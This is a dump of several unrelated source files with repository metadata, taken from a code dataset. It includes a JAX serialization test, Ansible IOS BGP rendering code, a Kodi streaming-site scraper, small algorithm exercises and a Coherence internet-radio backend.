    tspecs = jax.tree_map(serialization.get_tensorstore_spec, ckpt_paths)
    serialization.run_serialization([gda1], tspecs)
    m1, = serialization.run_deserialization(
        [create_global_mesh((4, 2), ('x', 'y'))],
        [P('x', 'y')],
        tspecs,
        [(12, 2)],
    )
    # Expected per-device shards of the (12, 2) result: rows 0-15 carry the
    # original data, the padded tail is zeros.
    expected_data = {
        0: np.array([[0], [2], [4]]),
        1: np.array([[1], [3], [5]]),
        2: np.array([[6], [8], [10]]),
        3: np.array([[7], [9], [11]]),
        4: np.array([[12], [14], [0]]),
        5: np.array([[13], [15], [0]]),
        6: np.array([[0], [0], [0]]),
        7: np.array([[0], [0], [0]]),
    }
    for l in m1.local_shards:
      self.assertArraysEqual(l.data.to_py(), expected_data[l.device.id])
  def test_spec_has_metadata(self):
    """_spec_has_metadata finds a 'metadata' key at any nesting depth."""
    spec = {
        'a': {
            'b': 1,
            'c': 2,
        },
        'd': 3,
        'e': {
            'a': 2,
            'metadata': 3
        },
        'f': 4
    }
    self.assertTrue(serialization._spec_has_metadata(spec))
    self.assertTrue(
        serialization._spec_has_metadata({
            'driver': 'zarr',
            'kvstore': 'gfile',
            'metadata': {
                'chunks': 4,
                'shape': (32, 64)
            },
            'one_more': 'thing'
        }))
  def test_spec_has_no_metadata(self):
    """A spec without any 'metadata' key reports False."""
    spec = {
        'a': {
            'b': 1,
            'c': 2,
        },
        'd': 3,
        'e': {
            'a': 2,
        },
        'f': 4
    }
    self.assertFalse(serialization._spec_has_metadata(spec))
  def test_empty_spec_has_no_metadata(self):
    """An empty spec trivially has no metadata."""
    spec = {}
    self.assertFalse(serialization._spec_has_metadata(spec))
|
[
"no-reply@google.com"
] |
no-reply@google.com
|
1958e4fd3cd5234c86f6dd7f259d43da2a520bd3
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03032/s283156387.py
|
473d0ed84ab4c0f25eab299ea36e78724919eff4
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 400
|
py
|
n,k = map(int,input().split())
lis = list(map(int,input().split()))
ans = 0
for i in range(n):
for j in range(n-i+1):
num = lis[:i]
if j > 0:
num += lis[-j:]
if len(num) <= k:
cnt = min(len(num),k-len(num))
num.sort()
for h in range(cnt):
num[h] = max(0,num[h])
ans = max(ans,sum(num))
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
582302c3619958b67faf74202cdf4418340616c1
|
b2f8c41358f6c6f4ce78328695a7b4f96adf806b
|
/staff_crm/apps.py
|
c4f1bce309a4b15bd048c1a4cfc2964dc43f754b
|
[] |
no_license
|
funsojoba/staff_management_api
|
6f472ea0a53095b6860969cf88f87b50fea69729
|
792bc652ec61e3f0d16bab1ff36cf72643161dbe
|
refs/heads/main
| 2023-05-24T04:45:20.895495
| 2021-06-13T19:45:07
| 2021-06-13T19:45:07
| 373,336,004
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
from django.apps import AppConfig
class StaffCrmConfig(AppConfig):
    """Django application configuration for the ``staff_crm`` app."""
    # Use 64-bit auto-incrementing primary keys by default (Django 3.2+).
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'staff_crm'
|
[
"42432746+funsojoba@users.noreply.github.com"
] |
42432746+funsojoba@users.noreply.github.com
|
2b1c888ed19da3073b1fcc9a4ad2599f84ed38f0
|
64bf39b96a014b5d3f69b3311430185c64a7ff0e
|
/intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/cisco/ios/plugins/module_utils/network/ios/providers/cli/config/bgp/address_family.py
|
0e0ce1ab78fecbd074f6c23d7f5f4d6866007720
|
[
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
SimonFangCisco/dne-dna-code
|
7072eba7da0389e37507b7a2aa5f7d0c0735a220
|
2ea7d4f00212f502bc684ac257371ada73da1ca9
|
refs/heads/master
| 2023-03-10T23:10:31.392558
| 2021-02-25T15:04:36
| 2021-02-25T15:04:36
| 342,274,373
| 0
| 0
|
MIT
| 2021-02-25T14:39:22
| 2021-02-25T14:39:22
| null |
UTF-8
|
Python
| false
| false
| 5,305
|
py
|
#
# (c) 2019, Ansible by Red Hat, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import re
from ansible.module_utils.six import iteritems
from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import (
to_list,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.providers.providers import (
CliProvider,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.providers.cli.config.bgp.neighbors import (
AFNeighbors,
)
from ansible.module_utils.common.network import to_netmask
class AddressFamily(CliProvider):
    """Renders IOS ``address-family`` stanzas under ``router bgp``."""
    def render(self, config=None):
        """Return the CLI command list for every configured address family.

        When *config* (the device's existing configuration text) is given,
        commands already present are suppressed; with operation=replace,
        address families not in the desired state are negated afterwards.
        """
        commands = list()
        safe_list = list()
        router_context = "router bgp %s" % self.get_value("config.bgp_as")
        context_config = None
        for item in self.get_value("config.address_family"):
            context = "address-family %s" % item["afi"]
            # "unicast" is the implicit default SAFI on IOS.
            if item["safi"] != "unicast":
                context += " %s" % item["safi"]
            context_commands = list()
            if config:
                context_path = [router_context, context]
                context_config = self.get_config_context(
                    config, context_path, indent=1
                )
            # Dispatch each configured key to its _render_<key> helper.
            for key, value in iteritems(item):
                if value is not None:
                    meth = getattr(self, "_render_%s" % key, None)
                    if meth:
                        resp = meth(item, context_config)
                        if resp:
                            context_commands.extend(to_list(resp))
            if context_commands:
                commands.append(context)
                commands.extend(context_commands)
                commands.append("exit-address-family")
            safe_list.append(context)
        if self.params["operation"] == "replace":
            if config:
                resp = self._negate_config(config, safe_list)
                commands.extend(resp)
        return commands
    def _negate_config(self, config, safe_list=None):
        """Return ``no address-family ...`` for stanzas present on the
        device but absent from *safe_list* (the desired state)."""
        commands = list()
        matches = re.findall(r"(address-family .+)$", config, re.M)
        for item in set(matches).difference(safe_list):
            commands.append("no %s" % item)
        return commands
    def _render_auto_summary(self, item, config=None):
        """Render ``[no] auto-summary`` if not already in *config*."""
        cmd = "auto-summary"
        if item["auto_summary"] is False:
            cmd = "no %s" % cmd
        if not config or cmd not in config:
            return cmd
    def _render_synchronization(self, item, config=None):
        """Render ``[no] synchronization`` if not already in *config*."""
        cmd = "synchronization"
        if item["synchronization"] is False:
            cmd = "no %s" % cmd
        if not config or cmd not in config:
            return cmd
    def _render_networks(self, item, config=None):
        """Render ``network ...`` statements; with operation=replace,
        also negate networks on the device that are not desired."""
        commands = list()
        safe_list = list()
        for entry in item["networks"]:
            network = entry["prefix"]
            cmd = "network %s" % network
            if entry["masklen"]:
                cmd += " mask %s" % to_netmask(entry["masklen"])
                network += " mask %s" % to_netmask(entry["masklen"])
            if entry["route_map"]:
                cmd += " route-map %s" % entry["route_map"]
                network += " route-map %s" % entry["route_map"]
            safe_list.append(network)
            if not config or cmd not in config:
                commands.append(cmd)
        if self.params["operation"] == "replace":
            if config:
                matches = re.findall(r"network (.*)", config, re.M)
                for entry in set(matches).difference(safe_list):
                    commands.append("no network %s" % entry)
        return commands
    def _render_redistribute(self, item, config=None):
        """Render ``redistribute ...`` statements; with operation=replace,
        also negate redistributions present on the device but undesired."""
        commands = list()
        safe_list = list()
        for entry in item["redistribute"]:
            option = entry["protocol"]
            cmd = "redistribute %s" % entry["protocol"]
            # These protocols take a process/instance id.
            if entry["id"] and entry["protocol"] in (
                "ospf",
                "ospfv3",
                "eigrp",
            ):
                cmd += " %s" % entry["id"]
                option += " %s" % entry["id"]
            if entry["metric"]:
                cmd += " metric %s" % entry["metric"]
            if entry["route_map"]:
                cmd += " route-map %s" % entry["route_map"]
            if not config or cmd not in config:
                commands.append(cmd)
            safe_list.append(option)
        if self.params["operation"] == "replace":
            if config:
                # Capture "<protocol> [id]" pairs from the running config.
                matches = re.findall(
                    r"redistribute (\S+)(?:\s*)(\d*)", config, re.M
                )
                for i in range(0, len(matches)):
                    matches[i] = " ".join(matches[i]).strip()
                for entry in set(matches).difference(safe_list):
                    commands.append("no redistribute %s" % entry)
        return commands
    def _render_neighbors(self, item, config):
        """ generate bgp neighbor configuration
        """
        return AFNeighbors(self.params).render(
            config, nbr_list=item["neighbors"]
        )
|
[
"sifang@cisco.com"
] |
sifang@cisco.com
|
be4034b96252307d6e130988d30401bb65314765
|
d7f4596491b47d74689d8731c9d0f10b51b5693f
|
/fastcampus/코딩테스트_면접/02. 알고리즘 이론/graph.py
|
6b593b8ff449f75e4ad3cf2229502620e69e8a70
|
[] |
no_license
|
wonjongah/DataStructure_CodingTest
|
797b62d48321abf065f1507f14a3ed0902f48399
|
9d28c2aefbba2486f6158c066fd249fca3904346
|
refs/heads/main
| 2023-06-04T15:54:30.048106
| 2021-06-30T14:09:41
| 2021-06-30T14:09:41
| 327,008,361
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
# Adjacency-list representation of a small undirected graph.
graph = {
    'A': ['B', 'C'],
    'B': ['A', 'D'],
    'C': ['A', 'G', 'H', 'I'],
    'D': ['B', 'E', 'F'],
    'E': ['D'],
    'F': ['D'],
    'G': ['C'],
    'H': ['C'],
    'I': ['C', 'J'],
    'J': ['I'],
}
print(graph)
|
[
"wonjongah@gmail.com"
] |
wonjongah@gmail.com
|
59fedb17f8722439c3814f478d134f626b0a4c4a
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/48/usersdata/82/15966/submittedfiles/estatistica.py
|
31ad4a0026cf93a6236f0ea7646c0afd92d24f53
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 794
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
def media(lista):
    """Return the arithmetic mean of *lista* (must be non-empty)."""
    soma = 0
    for valor in lista:
        soma = soma + valor
    return soma / len(lista)


def desviopadrao(lista):
    """Return the sample standard deviation of *lista* (n-1 denominator).

    Fixes the original, which referenced undefined names (``l``, the
    ``media`` value, the global ``n``), returned nothing, and whose
    result variables ``desviopadrao_a``/``desviopadrao_b`` were never
    created -- the final prints were a SyntaxError ('%2.f' with no %).
    """
    m = media(lista)
    soma = 0
    for valor in lista:
        soma = soma + (valor - m) ** 2
    return ((1 / (len(lista) - 1)) * soma) ** (1 / 2)


if __name__ == '__main__':
    # Interactive part guarded so importing the module does not block on
    # stdin (original Python 2 script, input() returns typed numbers).
    a = []
    b = []
    n = input('Digite a quantidade de elementos:')
    for i in range(0, n, 1):
        a.append(input('Digite um elemento:'))
    for i in range(0, n, 1):
        b.append(input('Digite um elemento:'))
    print('%.2f' % media(a))
    print('%.2f' % desviopadrao(a))
    print('%.2f' % media(b))
    print('%.2f' % desviopadrao(b))
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
5941ae15de8d50faefafcad8fed4e9d17d948e27
|
c7a6f8ed434c86b4cdae9c6144b9dd557e594f78
|
/ECE364/.PyCharm40/system/python_stubs/348993582/gtk/_gtk/MountOperation.py
|
d327e51af64f413a5022e8715f458a73a8e61d5b
|
[] |
no_license
|
ArbalestV/Purdue-Coursework
|
75d979bbe72106975812b1d46b7d854e16e8e15e
|
ee7f86145edb41c17aefcd442fa42353a9e1b5d1
|
refs/heads/master
| 2020-08-29T05:27:52.342264
| 2018-04-03T17:59:01
| 2018-04-03T17:59:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,919
|
py
|
# encoding: utf-8
# module gtk._gtk
# from /usr/lib64/python2.6/site-packages/gtk-2.0/gtk/_gtk.so
# by generator 1.136
# no doc
# imports
import atk as __atk
import gio as __gio
import gobject as __gobject
import gobject._gobject as __gobject__gobject
class MountOperation(__gio.MountOperation):
    """
    Object GtkMountOperation
    Properties from GtkMountOperation:
      parent -> GtkWindow: Parent
        The parent window
      is-showing -> gboolean: Is Showing
        Are we showing a dialog
      screen -> GdkScreen: Screen
        The screen where this window will be displayed.
    Signals from GMountOperation:
      ask-password (gchararray, gchararray, gchararray, GAskPasswordFlags)
      ask-question (gchararray, GStrv)
      reply (GMountOperationResult)
      aborted ()
      show-processes (gchararray, GArray, GStrv)
    Properties from GMountOperation:
      username -> gchararray: Username
        The user name
      password -> gchararray: Password
        The password
      anonymous -> gboolean: Anonymous
        Whether to use an anonymous user
      domain -> gchararray: Domain
        The domain of the mount operation
      password-save -> GPasswordSave: Password save
        How passwords should be saved
      choice -> gint: Choice
        The users choice
    Signals from GObject:
      notify (GParam)
    """
    # NOTE: auto-generated IDE stub from runtime introspection of the
    # gtk._gtk C extension; the pass bodies are placeholders only and the
    # real implementations live in the compiled module.
    def get_parent(self, *args, **kwargs): # real signature unknown
        pass
    def get_screen(self, *args, **kwargs): # real signature unknown
        pass
    def is_showing(self, *args, **kwargs): # real signature unknown
        pass
    def set_parent(self, *args, **kwargs): # real signature unknown
        pass
    def set_screen(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    __gtype__ = None # (!) real value is ''
|
[
"pkalita@princeton.edu"
] |
pkalita@princeton.edu
|
e260d0d50c7d74e84cf1062a5c25ccbe38c4e375
|
90360a1de1c19ab217ff0fceaaa3140cad4ddaa5
|
/plugin.video.salts/scrapers/icefilms_scraper.py
|
9fffbf94a63ac44d5c3ce8d39de54d0ed860f31e
|
[] |
no_license
|
trickaz/tknorris-beta-repo
|
934cbbf089e12607fe991d13977f0d8a61354f01
|
c4b82ef1b402514ef661bcc669852c44578fcaa0
|
refs/heads/master
| 2021-01-22T14:25:19.271493
| 2014-10-17T06:19:39
| 2014-10-17T06:19:39
| 25,358,146
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,462
|
py
|
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import scraper
import re
import urllib
import urlparse
import HTMLParser
import string
import xbmcaddon
from salts_lib.db_utils import DB_Connection
from salts_lib import log_utils
from salts_lib.constants import VIDEO_TYPES
from salts_lib.constants import QUALITIES
# Map IceFilms rip-section headings to SALTS quality constants.
QUALITY_MAP = {'HD 720P': QUALITIES.HD, 'DVDRIP / STANDARD DEF': QUALITIES.HIGH}
#BROKEN_RESOLVERS = ['180UPLOAD', 'HUGEFILES', 'VIDPLAY']
# Upper-case hoster names whose resolvers are broken; sources on these
# hosts are skipped.  Currently empty (previous blacklist kept above).
BROKEN_RESOLVERS = []
BASE_URL='http://www.icefilms.info'
class IceFilms_Scraper(scraper.Scraper):
    """Python 2 SALTS scraper for icefilms.info (movies and TV)."""
    base_url=BASE_URL
    def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
        self.timeout=timeout
        self.db_connection = DB_Connection()
        # The base URL is user-configurable per scraper via addon settings.
        self.base_url = xbmcaddon.Addon().getSetting('%s-base_url' % (self.get_name()))
    @classmethod
    def provides(cls):
        """Video types this scraper can serve."""
        return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE, VIDEO_TYPES.MOVIE])
    @classmethod
    def get_name(cls):
        return 'IceFilms'
    def resolve_link(self, link):
        """POST the source's query back to the site and extract the final
        hoster URL; returns None for hosts in BROKEN_RESOLVERS."""
        url, query = link.split('?', 1)
        data = urlparse.parse_qs(query, True)
        url = urlparse.urljoin(self.base_url, url)
        html = self._http_get(url, data=data, cache_limit=0)
        match = re.search('url=(.*)', html)
        if match:
            url=urllib.unquote_plus(match.group(1))
            if url.upper() in BROKEN_RESOLVERS:
                url = None
            return url
    def format_source_label(self, item):
        """Human-readable label shown in the source-selection dialog."""
        label='[%s] %s%s (%s/100) ' % (item['quality'], item['label'], item['host'], item['rating'])
        return label
    def get_sources(self, video):
        """Scrape the video's page for hoster links.

        Pulls the hidden iframe, then the per-request secret/token used by
        the site's AJAX endpoint, and builds one source dict per link.
        """
        source_url=self.get_url(video)
        sources = []
        if source_url:
            try:
                url = urlparse.urljoin(self.base_url, source_url)
                html = self._http_get(url, cache_limit=.5)
                pattern='<iframe id="videoframe" src="([^"]+)'
                match = re.search(pattern, html)
                frame_url = match.group(1)
                url = urlparse.urljoin(self.base_url, frame_url)
                html = self._http_get(url, cache_limit=.5)
                # Anti-scraping tokens embedded in the player page.
                match=re.search('lastChild\.value="([^"]+)"', html)
                secret=match.group(1)
                match=re.search('"&t=([^"]+)', html)
                t=match.group(1)
                pattern='<div class=ripdiv>(.*?)</div>'
                for container in re.finditer(pattern, html):
                    fragment=container.group(0)
                    # Section heading names the rip quality (see QUALITY_MAP).
                    match=re.match('<div class=ripdiv><b>(.*?)</b>', fragment)
                    if match:
                        quality=QUALITY_MAP[match.group(1).upper()]
                    else:
                        quality=None
                    pattern='onclick=\'go\((\d+)\)\'>([^<]+)(<span.*?)</a>'
                    for match in re.finditer(pattern, fragment):
                        link_id, label, host_fragment = match.groups()
                        source = {'multi-part': False, 'quality': quality, 'class': self, 'label': label, 'rating': None, 'views': None, 'direct': False}
                        # Strip markup from the hoster name fragment.
                        host=re.sub('(<[^>]+>|</span>)','',host_fragment)
                        source['host']=host.lower()
                        if host.upper() in BROKEN_RESOLVERS:
                            continue
                        url = '/membersonly/components/com_iceplayer/video.phpAjaxResp.php?id=%s&s=999&iqs=&url=&m=-999&cap=&sec=%s&t=%s' % (link_id, secret, t)
                        source['url']=url
                        sources.append(source)
            except Exception as e:
                # Best effort: a scrape failure yields an empty source list.
                log_utils.log('Failure (%s) during icefilms get sources: |%s|' % (str(e), video))
        return sources
    def get_url(self, video):
        return super(IceFilms_Scraper, self)._default_get_url(video)
    def search(self, video_type, title, year):
        """Search the A-Z index pages for *title*, optionally matching *year*."""
        if video_type==VIDEO_TYPES.MOVIE:
            url = urlparse.urljoin(self.base_url, '/movies/a-z/')
        else:
            url = urlparse.urljoin(self.base_url,'/tv/a-z/')
        # Index pages are keyed by first letter, ignoring leading articles;
        # titles starting with a digit live under '1'.
        if title.upper().startswith('THE '):
            first_letter=title[4:5]
        elif title.upper().startswith('A '):
            first_letter = title[2:3]
        elif title[:1] in string.digits:
            first_letter='1'
        else:
            first_letter=title[:1]
        url = url + first_letter.upper()
        html = self._http_get(url, cache_limit=.25)
        h = HTMLParser.HTMLParser()
        html = unicode(html, 'windows-1252')
        html = h.unescape(html)
        norm_title = self._normalize_title(title)
        pattern = 'class=star.*?href=([^>]+)>(.*?)(?:\s*\((\d+)\))?</a>'
        results=[]
        for match in re.finditer(pattern, html, re.DOTALL):
            url, match_title, match_year = match.groups('')
            if norm_title in self._normalize_title(match_title) and (not year or not match_year or year == match_year):
                result={'url': url, 'title': match_title, 'year': match_year}
                results.append(result)
        return results
    def _get_episode_url(self, show_url, video):
        """Find the /ip.php link for a specific SxxEyy on the show page."""
        episode_pattern = 'href=(/ip\.php[^>]+)>%sx0?%s\s+' % (video.season, video.episode)
        title_pattern='class=star>\s*<a href=([^>]+)>(?:\d+x\d+\s+)+([^<]+)'
        return super(IceFilms_Scraper, self)._default_get_episode_url(show_url, video, episode_pattern, title_pattern)
    def _http_get(self, url, data=None, cache_limit=8):
        return super(IceFilms_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=cache_limit)
|
[
"tknorris@gmail.com"
] |
tknorris@gmail.com
|
1c9798c3ad320b1268eb7c05f3413c11de8cc2c4
|
74d6b36ae48a2153fa35c56d2448c05b64c72bf8
|
/contests/550/A-two-substrings.py
|
1cd1bdb89a05efe3c401c3f0559cc701f7386b67
|
[] |
no_license
|
hariharanragothaman/codeforces-solutions
|
205ec8b717e8eb3e4d700fc413159c49a582cff6
|
1566a9187cc16e1461ddb55dbcc393493604dfcd
|
refs/heads/master
| 2023-06-24T11:33:52.255437
| 2021-07-25T14:33:52
| 2021-07-25T14:33:52
| 282,783,158
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,935
|
py
|
"""
Given a string, we need to find , if it contains AB, and BA seperately and they are non-overlapping
The strings can be in any order.
"""
from typing import List
# Polynomial rolling-hash parameters: a small prime base and a large prime
# modulus (shared by compute_hash and count_occurences below).
p = 31
m = 10 ** 9 + 9


def compute_hash(s):
    """Return the list of prefix hashes of *s* under the (p, m) rolling hash.

    hash_values[i] is the hash of s[:i]; hash_values[0] is 0.  Characters are
    mapped to 1..26 ('a' -> 1) so that leading 'a's still affect the hash.

    Bug fixed: the original built the prefix table but never returned it,
    so the function had no observable effect for callers.
    """
    n = len(s)
    power_mod = [1]
    for i in range(n):
        power_mod.append((power_mod[-1] * p) % m)
    hash_values = [0] * (n + 1)
    for i in range(n):
        hash_values[i + 1] = (
            hash_values[i] + (ord(s[i]) - ord("a") + 1) * power_mod[i]
        ) % m
    return hash_values
def count_occurences(text, pattern):
    """Return the start indices of every (possibly overlapping) occurrence
    of *pattern* in *text*, located with a polynomial rolling hash.

    Matches are detected by hash equality only; with these parameters a
    false positive is astronomically unlikely but not impossible.
    """
    base = 31          # mirrors the module-level constants p / m
    mod = 10 ** 9 + 9
    t_len = len(text)
    p_len = len(pattern)

    # powers[i] == base**i (mod mod)
    powers = [1]
    for _ in range(t_len):
        powers.append(powers[-1] * base % mod)

    # prefix[i] is the hash of text[:i]
    prefix = [0] * (t_len + 1)
    for idx, ch in enumerate(text):
        prefix[idx + 1] = (prefix[idx] + (ord(ch) - ord("a") + 1) * powers[idx]) % mod

    pat_hash = 0
    for idx in range(p_len):
        pat_hash += (ord(pattern[idx]) - ord("a") + 1) * powers[idx] % mod

    hits = []
    start = 0
    while start + p_len - 1 < t_len:
        # Hash of text[start:start+p_len], still scaled by base**start,
        # so the pattern hash is scaled the same way before comparing.
        window = (prefix[start + p_len] - prefix[start] + mod) % mod
        if window == pat_hash * powers[start] % mod:
            hits.append(start)
        start += 1
    return hits
def solve(s):
    """Return True iff *s* contains non-overlapping "AB" and "BA" substrings
    (in either order).

    Improvements over the original:
    - occurrences are found with a direct O(n) scan instead of a rolling
      hash, removing the dependency on count_occurences;
    - the nested all-pairs check (O(|ab| * |ba|), a TLE risk) is replaced by
      an O(1) test on the extreme positions — two occurrences at i and j are
      non-overlapping iff |i - j| >= 2, and the largest |i - j| over all
      pairs is realised by (max, min) of the two index lists;
    - the unused bruteforce helper has been removed.
    """
    ab = [i for i in range(len(s) - 1) if s[i:i + 2] == "AB"]
    ba = [i for i in range(len(s) - 1) if s[i:i + 2] == "BA"]
    if not ab or not ba:
        return False
    return max(ab) - min(ba) >= 2 or max(ba) - min(ab) >= 2
if __name__ == "__main__":
    # Read one line from stdin and report whether it contains
    # non-overlapping "AB" and "BA".
    print("YES" if solve(input()) else "NO")
|
[
"hariharanragothaman@gmail.com"
] |
hariharanragothaman@gmail.com
|
fc6ec366cc16a9f609e3910d19770d58645a59b8
|
eb3683f9127befb9ef96d8eb801206cf7b84d6a7
|
/stypy/invokation/type_rules/modules/numpy/lib/ufunclike/ufunclike__type_modifiers.py
|
8a0fa8e78c44a7d76c174b17b2107251eb822674
|
[] |
no_license
|
ComputationalReflection/stypy
|
61ec27333a12f76ac055d13f8969d3e0de172f88
|
be66ae846c82ac40ba7b48f9880d6e3990681a5b
|
refs/heads/master
| 2021-05-13T18:24:29.005894
| 2018-06-14T15:42:50
| 2018-06-14T15:42:50
| 116,855,812
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 373
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy
from stypy.invokation.handlers import call_utilities
class TypeModifiers:
    """Type-rule modifiers for numpy.lib.ufunclike (stypy invokation layer)."""

    @staticmethod
    def fix(localization, proxy_obj, arguments):
        """Return the static type of numpy.fix(...): a numpy array.

        If the first argument is already a numpy array its type is returned
        unchanged; otherwise an equivalent numpy-array type is synthesised
        from it via call_utilities.
        """
        first_arg = arguments[0]
        if not call_utilities.is_numpy_array(first_arg):
            return call_utilities.create_numpy_array(first_arg)
        return first_arg
|
[
"redondojose@uniovi.es"
] |
redondojose@uniovi.es
|
dbf30296d71e7bf60831a0c340e730a93a7d7a5c
|
c78d25a2ea56f012da3381d7245c3e08556129e1
|
/coherence/backends/radiotime_storage.py
|
1f2c5d69ba48ac3beee20a08759cb96b1a85c6c1
|
[
"MIT"
] |
permissive
|
Python3pkg/Cohen
|
556ad3952136fc2eafda99202a7280c2ece2477e
|
14e1e9f5b4a5460033692b30fa90352320bb7a4e
|
refs/heads/master
| 2021-01-21T17:13:58.602576
| 2017-05-21T08:33:16
| 2017-05-21T08:33:16
| 91,943,281
| 1
| 0
| null | 2017-05-21T08:32:55
| 2017-05-21T08:32:55
| null |
UTF-8
|
Python
| false
| false
| 7,113
|
py
|
# Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# an internet radio media server for the Coherence UPnP Framework
# based on the radiotime (http://radiotime.com) catalog service
# Copyright 2007, Frank Scholz <coherence@beebits.net>
# Copyright 2009-2010, Jean-Michel Sizun <jmDOTsizunATfreeDOTfr>
from lxml import etree
from twisted.python.failure import Failure
from coherence.upnp.core import utils
from coherence.upnp.core import DIDLLite
from coherence.upnp.core.DIDLLite import Resource
from coherence.backend import BackendItem, Container, LazyContainer, AbstractBackendStore
OPML_BROWSE_URL = 'http://opml.radiotime.com/Browse.ashx'
# we only handle mp3 audio streams for now
DEFAULT_FORMAT = "mp3"
DEFAULT_MIMETYPE = "audio/mpeg"
# TODO : extend format handling using radiotime API
class RadiotimeAudioItem(BackendItem):
    """One radiotime station, exposed as a UPnP audio-broadcast item."""

    logCategory = 'radiotime'

    def __init__(self, outline):
        # *outline* is an OPML <outline type="audio"> element from the
        # radiotime Browse API.
        BackendItem.__init__(self)
        self.preset_id = outline.get('preset_id')
        self.name = outline.get('text')
        self.mimetype = DEFAULT_MIMETYPE
        self.stream_url = outline.get('URL')
        self.image = outline.get('image')
        self.item = None  # DIDL-Lite object, built lazily in get_item()

    def replace_by(self, item):
        # Do nothing: the replacement item is assumed to describe the same
        # station, so the existing metadata is kept.
        return

    def get_item(self):
        """Return the DIDL-Lite AudioBroadcast, building it on first use."""
        if self.item is None:  # idiom fix: was "== None"
            upnp_id = self.get_id()
            upnp_parent_id = self.parent.get_id()
            self.item = DIDLLite.AudioBroadcast(upnp_id, upnp_parent_id, self.name)
            self.item.albumArtURI = self.image
            res = Resource(self.stream_url, 'http-get:*:%s:%s' % (self.mimetype,
                           ';'.join(('DLNA.ORG_PN=MP3',
                                     'DLNA.ORG_CI=0',
                                     'DLNA.ORG_OP=01',
                                     'DLNA.ORG_FLAGS=01700000000000000000000000000000'))))
            res.size = 0  # size unknown for a live stream
            self.item.res.append(res)
        return self.item

    def get_path(self):
        # Bug fixed: this returned self.url, an attribute that was never
        # assigned (its assignment was commented out in __init__), so every
        # call raised AttributeError.  The stream URL is the item's path.
        return self.stream_url

    def get_id(self):
        return self.storage_id
class RadiotimeStore(AbstractBackendStore):
    """Coherence MediaServer backend that mirrors the radiotime.com OPML
    catalog as a lazily-populated UPnP container hierarchy."""

    logCategory = 'radiotime'
    implements = ['MediaServer']

    def __init__(self, server, **kwargs):
        """Read configuration, build the root Browse URL and set the root item.

        Recognised config/kwargs: name, refresh (minutes), browse_url,
        partner_id, username (the server UUID is used as a serial when no
        username is configured) and locale.
        """
        AbstractBackendStore.__init__(self, server, **kwargs)
        self.name = kwargs.get('name', 'radiotimeStore')
        # 'refresh' is given in minutes; stored internally in seconds.
        self.refresh = int(kwargs.get('refresh', 60)) * 60
        self.browse_url = self.config.get('browse_url', OPML_BROWSE_URL)
        self.partner_id = self.config.get('partner_id', 'TMe3Cn6v')
        self.username = self.config.get('username', None)
        self.locale = self.config.get('locale', 'en')
        self.serial = server.uuid

        # construct URL for root menu: identify either by username or by the
        # server UUID acting as a device serial
        if self.username is not None:
            identification_param = "username=%s" % self.username
        else:
            identification_param = "serial=%s" % self.serial

        formats_value = DEFAULT_FORMAT
        root_url = "%s?partnerId=%s&%s&formats=%s&locale=%s" % (self.browse_url, self.partner_id, identification_param, formats_value, self.locale)

        # set root item: a LazyContainer that fetches its children from the
        # OPML service on demand, re-fetching after self.refresh seconds
        root_item = LazyContainer(None, "root", "root", self.refresh, self.retrieveItemsForOPML, url=root_url)
        self.set_root_item(root_item)

        self.init_completed()

    def upnp_init(self):
        """Advertise the stream protocols this server can source."""
        self.current_connection_id = None
        # NOTE(review): '4' looks like the WMC audio-root mapping used by
        # other coherence backends — confirm against the wmc_mapping docs.
        self.wmc_mapping = {'4': self.get_root_id()}
        if self.server:
            self.server.connection_manager_server.set_variable(0, 'SourceProtocolInfo',
